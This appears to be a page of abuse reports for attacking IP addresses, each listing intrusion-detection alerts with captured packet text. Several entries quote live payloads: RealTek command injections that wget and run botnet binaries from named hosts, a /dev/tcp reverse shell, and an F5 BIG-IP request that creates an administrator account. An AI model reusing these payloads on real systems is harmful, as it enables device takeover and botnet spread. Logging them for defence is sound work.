117.219.142.185
26 Dec 2024
SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt (1:44687:3)
Time: ... show more SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt (1:44687:3)
Time: 2024-12-25 23:42:49 - (Src Port: 47287, Dst Port: 80)
Packet Text: ...
.....
....E..([email protected] ...
dd ...P........P. ..... show less
Hacking
202.21.42.108
11 Dec 2024
MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
Time 2024-12-11 ... show more MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
Time 2024-12-11 06:53:34 (Src Port: 46763, Dst Port: 80)
Packet Text: ...
.....
....E.......@.....*l
dd ...P........P. .....Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118 show less
Hacking
91.193.18.13
04 Dec 2024
Source Port: TCP 47059 / Destination TCP 25
CnC Connected Security Intelligence Event - CnC T ... show more Source Port: TCP 47059 / Destination TCP 25
CnC Connected Security Intelligence Event - CnC The host may be under remote control 2024-12-04 06:57:39
Similar event on Internal IPs show less
Hacking
45.124.95.225
05 Nov 2024
Seen in a callback packet text from IP 146.103.38.222
SERVER-OTHER RealTek UDPServer command ... show more Seen in a callback packet text from IP 146.103.38.222
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time: 2024-11-05 08:49:16 (Src Port: 54576, Dst Port: 9034)
Packet Text: ..]....K.._...E....1.......g&.?.-..0#J....orf;cd /tmp; rm -rf main_mpsl; /bin/busybox wget http://45.124.95.225/main_mpsl; chmod +x main_mpsl; ./main_mpsl realtek; # show less
Hacking
146.103.38.222
05 Nov 2024
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time: 2024-11-05 08:49:1 ... show more SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time: 2024-11-05 08:49:16 (Src Port: 54576, Dst Port: 9034)
Packet Text: ..]....K.._...E....1.......g&.?.-..0#J....orf;cd /tmp; rm -rf main_mpsl; /bin/busybox wget http://45.124.95.225/main_mpsl; chmod +x main_mpsl; ./main_mpsl realtek; # show less
SQL Injection
213.152.161.30
21 Oct 2024
CnC Time: 2024-10-21 12:49:13
Source Port: 40125, Destination Port: 3306
Hacking
164.52.24.187
04 Oct 2024
PUA-OTHER XMRig cryptocurrency mining pool connection attempt (1:45549:4)
Time: 2024-10-03 12 ... show more PUA-OTHER XMRig cryptocurrency mining pool connection attempt (1:45549:4)
Time: 2024-10-03 12:32:43 (Src Port: 42951, Dst Port: 25)
Packet Text: ..]....K.._...E..,[email protected] ..?.-......{.=83>............
l.....?.{"id": 1, "jsonrpc": "2.0", "method": "login", "params": { "login": "48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD", "pass": "x", "agent": "XMRig/2.6.0-beta2 (Linux x86_64) libuv/1.8.0 gcc/5.4.0"}} show less
Web App Attack
209.38.23.48
30 Sep 2024
Time 2024-09-29 02:35:18 (Src Port: 53670, Dst Port: 80)
Packet Text: ...
.....
... show more Time 2024-09-29 02:35:18 (Src Port: 53670, Dst Port: 80)
Packet Text: ...
.....
....E..O....@....&.0
dd ...P........P. .....<?=base64_decode("emV0YXNheWFuZw==");?> show less
Web App Attack
45.148.10.238
17 Sep 2024
CnC traffic src port 42208 tcp dest port 443 (https) tcp
2024-09-16 14:50:01
Hacking
194.113.106.241
06 Sep 2024
Time 2024-09-06 13:23:11 (Src Port: 52495, Dst Port: 9034)
Packet Text: ..]....K.._...E..h.1. ... show more Time 2024-09-06 13:23:11 (Src Port: 52495, Dst Port: 9034)
Packet Text: ..]....K.._...E..h.1....X
.qj.?.-...#J.T..orf;0<&196;exec 196<>/dev/tcp/194.113.106.241/7777; sh <&196 >&196 2>&196; # show less
SQL Injection
45.145.42.234
07 Aug 2024
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1) 5x
2024-08-07 07:57:54 S ... show more SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1) 5x
2024-08-07 07:57:54 Source Ports UDP 50906,45573, 42614, 43275, 33057, 37465 > Destination port 9034 show less
SQL Injection
128.199.16.182
17 Jun 2024
Port scanning (Port 3389) on various devices.
Port Scan
Port Scan
117.242.239.219
27 May 2024
SERVER-WEBAPP DD-WRT httpd cgi-bin remote command execution attempt (1:26275:5)
Time: 2024-05 ... show more SERVER-WEBAPP DD-WRT httpd cgi-bin remote command execution attempt (1:26275:5)
Time: 2024-05-25 02:07:35 (Src Port: 49777, Dst Port: 8443)
Packet Text: ...
.....
....E..([email protected] ...
dj..q .........P. ..... show less
SQL Injection
92.249.48.41
22 May 2024
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2024-05-21 17:44:01 ... show more SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2024-05-21 17:44:01 (Src Port: 40198, Dst Port: 9034)
Packet Text: ..]....K.._...E....1......\.0)?.-...#J.u..orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://91.92.252.157/rebirth.mpsl; chmod 777 *; ./rebirth.mpsl; # show less
SQL Injection
206.189.204.202
29 Apr 2024
SERVER-WEBAPP F5 BIG-IP AJP authentication bypass attempt
Time 2024-04-26 15:59:58, (Src Por ... show more SERVER-WEBAPP F5 BIG-IP AJP authentication bypass attempt
Time 2024-04-26 15:59:58, (Src Port: 51054, Dst Port: 80)
Packet Text: ...
.....
....E..,....@.......
dd .n.P........P. .......HTTP/1.1.../tmui/Control/form...127.0.0.1...localhost...localhost..P.....Tmui-Dubbuf...BBBBBBBBBBB..
REMOTEROLE...0.....localhost....admin...q_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=iAEKx&name_before=&passwd=Ilt7rTMJAcBE&passwd_before=&finished=x&finished_before=... show less
Web App Attack
45.159.188.241
19 Jan 2024
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2024-01-19 03:14:46 ... show more SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2024-01-19 03:14:46 UDP (Src Port: 37202, Dst Port: 9034)
Packet Text: ..]....K.._...E....1......-...?.-..R#J.l..orf;cd /tmp||cd /var&&/bin/busybox wget https://paradox-team.dev/Anti-Honey-Pot/x86_64 -O 11&&./11;# show less
SQL Injection
157.90.250.90
11 Jan 2024
MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
IP address seen ... show more MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
IP address seen in callback from attempt initiated from 159.203.23.44
Time 2024-01-10 17:12:45 show less
Hacking
159.203.23.44
11 Jan 2024
...
.....
....E.......@......,
dd..".P........P. .....User-Agent: Hello, world< ... show more ...
.....
....E.......@......,
dd..".P........P. .....User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive show less
Hacking
59.178.92.220
19 Dec 2023
Time 2023-12-18 21:43:22 (Src Port: 43166, Dst Port: 80)
Packet Text: ...
.....
... show more Time 2023-12-18 21:43:22 (Src Port: 43166, Dst Port: 80)
Packet Text: ...
.....
....E.......@...;.\.
dd ...P........P. .....User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive show less
Hacking
134.19.179.195
14 Dec 2023
Time 2023-12-12 23:42:22
Source port 44959 UDP / Destination 35442 / udp
Hacking
94.156.6.92
31 Oct 2023
Seen an packet info of attack from 94.156.6.66, possible callback or malware host
Exploited Host
94.156.6.66
31 Oct 2023
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2023-10-31 12:28:11 ... show more SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2023-10-31 12:28:11 (Src Port: 34351, Dst Port: 9034)
Packet Text: ..]......,E...E(...1....(.^..B?.$../#J.q..orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://94.156.6.92/uwu/mpel; chmod +x mpsl; ./mpsl rt.mpsl; # show less
SQL Injection
107.175.212.32
31 Oct 2023
Various unauthorized attempts between 2023-10-31 10:51:44 - 2023-10-31 12:47:33
Hacking
222.112.82.141
31 Oct 2023
Unauthorized attempt 2023-10-31 03:25:00
Source port 49617 > Destination port 61616
Hacking
194.180.48.119
18 Oct 2023
Unauthorized attempt 2023-10-18 08:50:53
Source Port 50555 > Destination Port 25
Hacking